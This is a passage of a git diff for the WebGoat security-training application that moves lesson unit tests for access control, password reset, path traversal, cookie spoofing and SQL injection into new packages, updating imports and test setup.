  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.missing_ac.DisplayUser;
+import org.owasp.webgoat.lessons.missing_ac.User;
 
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 
 class DisplayUserTest {
 
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenusTest.java b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenusTest.java
similarity index 90%
rename from webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenusTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenusTest.java
index 3ce8340b3..f6e8d2f88 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenusTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenusTest.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -51,7 +51,7 @@ public class MissingFunctionACHiddenMenusTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/access-control/hidden-menu")
                 .param("hiddenMenu1", "Users")
                 .param("hiddenMenu2", "Config"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("access-control.hidden-menus.success"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.success"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
     }
 
@@ -60,7 +60,7 @@ public class MissingFunctionACHiddenMenusTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/access-control/hidden-menu")
                 .param("hiddenMenu1", "Config")
                 .param("hiddenMenu2", "Users"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("access-control.hidden-menus.close"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.close"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
@@ -69,7 +69,7 @@ public class MissingFunctionACHiddenMenusTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/access-control/hidden-menu")
                 .param("hiddenMenu1", "Foo")
                 .param("hiddenMenu2", "Bar"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("access-control.hidden-menus.failure"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.failure"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsersTest.java
similarity index 85%
rename from webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsersTest.java
index 4917549eb..fff7fe910 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsersTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsersTest.java
@@ -20,18 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mock;
-import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC;
 import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
@@ -40,16 +36,12 @@ import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
 class MissingFunctionACUsersTest extends LessonTest {
 
-    @Autowired
-    private MissingFunctionAC ac;
-
     @BeforeEach
     void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(ac);
+        when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdminTest.java
similarity index 78%
rename from webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdminTest.java
index 637bf1a37..1ba79bbd0 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdminTest.java
@@ -1,26 +1,26 @@
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.missing_ac.DisplayUser;
+import org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC;
+import org.owasp.webgoat.lessons.missing_ac.User;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
 class MissingFunctionACYourHashAdminTest extends LessonTest {
 
-    @Autowired
-    private MissingFunctionAC ac;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(ac);
+        when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -41,4 +41,4 @@ class MissingFunctionACYourHashAdminTest extends LessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionYourHashTest.java
similarity index 88%
rename from webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionYourHashTest.java
index cc07f2e36..9c764b78b 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionYourHashTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionYourHashTest.java
@@ -20,29 +20,26 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.owasp.webgoat.users.WebGoatUser;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
 class MissingFunctionYourHashTest extends LessonTest {
-    @Autowired
-    private MissingFunctionAC ac;
 
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(ac);
+        when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
diff --git a/webgoat-lessons/password-reset/src/main/test/java/org/owasp/webgoat/password_reset/SecurityQuestionAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignmentTest.java
similarity index 88%
rename from webgoat-lessons/password-reset/src/main/test/java/org/owasp/webgoat/password_reset/SecurityQuestionAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignmentTest.java
index 646d90870..91bc19169 100644
--- a/webgoat-lessons/password-reset/src/main/test/java/org/owasp/webgoat/password_reset/SecurityQuestionAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignmentTest.java
@@ -1,31 +1,29 @@
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
 import org.hamcrest.CoreMatchers;
-import org.junit.Before;
+import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.runner.RunWith;
-import org.mockito.Mockito;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.owasp.webgoat.container.plugins.LessonTest;
 import org.springframework.mock.web.MockHttpSession;
-import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
+import org.springframework.test.context.junit.jupiter.SpringExtension;
+import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
+import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
 @ExtendWith(SpringExtension.class)
 public class SecurityQuestionAssignmentTest extends LessonTest {
 
-    @Autowired
-    private PasswordReset passwordReset;
+    private MockMvc mockMvc;
 
     @BeforeEach
     public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(passwordReset);
+        when(webSession.getCurrentLesson()).thenReturn(new PasswordReset());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        Mockito.when(webSession.getUserName()).thenReturn("unit-test");
     }
 
     @Test
@@ -82,4 +80,4 @@ public class SecurityQuestionAssignmentTest extends LessonTest {
                 .param("question", "What is your favorite animal?").session(mocksession2)).
                 andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadFixTest.java b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFixTest.java
similarity index 89%
rename from webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadFixTest.java
rename to src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFixTest.java
index 11312be69..b0c8c63d4 100644
--- a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadFixTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFixTest.java
@@ -1,11 +1,12 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.mock.web.MockMultipartFile;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
@@ -17,15 +18,11 @@ import java.io.File;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class ProfileUploadFixTest extends LessonTest {
 
-    @Autowired
-    private PathTraversal pathTraversal;
-
     @BeforeEach
     public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(pathTraversal);
+        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         Mockito.when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -55,4 +52,4 @@ public class ProfileUploadFixTest extends LessonTest {
     }
 
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadRemoveUserInputTest.java b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInputTest.java
similarity index 89%
rename from webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadRemoveUserInputTest.java
rename to src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInputTest.java
index 541f1625b..3a4d50613 100644
--- a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadRemoveUserInputTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInputTest.java
@@ -1,11 +1,12 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.mock.web.MockMultipartFile;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
@@ -17,15 +18,11 @@ import java.io.File;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class ProfileUploadRemoveUserInputTest extends LessonTest {
-	
-    @Autowired
-    private PathTraversal pathTraversal;
 
     @BeforeEach
     public void setup() { 
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(pathTraversal);
+        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         Mockito.when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -54,4 +51,4 @@ public class ProfileUploadRemoveUserInputTest extends LessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadRetrievalTest.java b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
similarity index 93%
rename from webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadRetrievalTest.java
rename to src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
index 08e72941c..da3e80194 100644
--- a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadRetrievalTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
@@ -1,10 +1,11 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.security.core.token.Sha512DigestUtils;
@@ -25,15 +26,11 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class ProfileUploadRetrievalTest extends LessonTest {
 
-    @Autowired
-    private PathTraversal pathTraversal;
-
     @BeforeEach
     public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(pathTraversal);
+        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         Mockito.when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -82,4 +79,4 @@ public class ProfileUploadRetrievalTest extends LessonTest {
                 .andExpect(status().is(404))
                 .andExpect(content().string(containsString("cats" + File.separator + "8.jpg")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadTest.java b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadTest.java
similarity index 93%
rename from webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadTest.java
rename to src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadTest.java
index 2389a1157..d88a675c6 100644
--- a/webgoat-lessons/path-traversal/src/test/java/org/owasp/webgoat/path_traversal/ProfileUploadTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadTest.java
@@ -1,11 +1,12 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.mock.web.MockMultipartFile;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
@@ -17,15 +18,11 @@ import java.io.File;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class ProfileUploadTest extends LessonTest {
 
-    @Autowired
-    private PathTraversal pathTraversal;
-
     @BeforeEach
     public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(pathTraversal);
+        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         Mockito.when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -79,4 +76,4 @@ public class ProfileUploadTest extends LessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java
similarity index 98%
rename from webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java
index acec30454..e0cdf3113 100644
--- a/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java
@@ -20,19 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.spoofcookie;
-
-import static org.hamcrest.Matchers.emptyString;
-import static org.hamcrest.Matchers.not;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
-import java.util.stream.Stream;
-
-import javax.servlet.http.Cookie;
+package org.owasp.webgoat.lessons.spoofcookie;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -43,12 +31,23 @@ import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.Arguments;
 import org.junit.jupiter.params.provider.MethodSource;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
 import org.springframework.http.MediaType;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.ResultActions;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
+import javax.servlet.http.Cookie;
+import java.util.stream.Stream;
+
+import static org.hamcrest.Matchers.emptyString;
+import static org.hamcrest.Matchers.not;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 /***
  *
  * @author Angel Olle Blazquez
diff --git a/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java
similarity index 96%
rename from webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java
rename to src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java
index 9edc3481f..f2c9e4a4d 100644
--- a/webgoat-lessons/spoof-cookie/src/test/java/org/owasp/webgoat/spoofcookie/encoders/EncDecTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.spoofcookie.encoders;
+package org.owasp.webgoat.lessons.spoofcookie.encoders;
 
 import static org.hamcrest.CoreMatchers.is;
 import static org.hamcrest.MatcherAssert.assertThat;
@@ -34,6 +34,7 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.Arguments;
 import org.junit.jupiter.params.provider.MethodSource;
+import org.owasp.webgoat.lessons.spoofcookie.encoders.EncDec;
 
 /***
  *
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/SqlLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/SqlLessonTest.java
similarity index 83%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/SqlLessonTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/SqlLessonTest.java
index 9aa497ec0..7b4ee2076 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/SqlLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/SqlLessonTest.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection;
+package org.owasp.webgoat.lessons.sql_injection;
 
 import org.junit.jupiter.api.BeforeEach;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.owasp.webgoat.sql_injection.introduction.SqlInjection;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.sql_injection.introduction.SqlInjection;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
@@ -32,12 +32,9 @@ import static org.mockito.Mockito.when;
 
 public class SqlLessonTest extends LessonTest {
 
-    @Autowired
-    private SqlInjection sql = new SqlInjection();
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(sql);
+        when(webSession.getCurrentLesson()).thenReturn(new SqlInjection());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson10Test.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10Test.java
similarity index 95%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson10Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10Test.java
index 9d85993df..a2f702eb3 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson10Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10Test.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -36,7 +36,6 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author Benedikt Stuhrmann
  * @since 11/07/18.
  */
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson10Test extends SqlLessonTest {
 
     private String completedError = "JSON path \"lessonCompleted\"";
@@ -71,4 +70,4 @@ public class SqlInjectionLesson10Test extends SqlLessonTest {
                 .andExpect(jsonPath("lessonCompleted", is(true)))
                 .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.success"))));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson2Test.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2Test.java
similarity index 93%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson2Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2Test.java
index 99bf74fde..d6cd74321 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson2Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2Test.java
@@ -20,19 +20,18 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
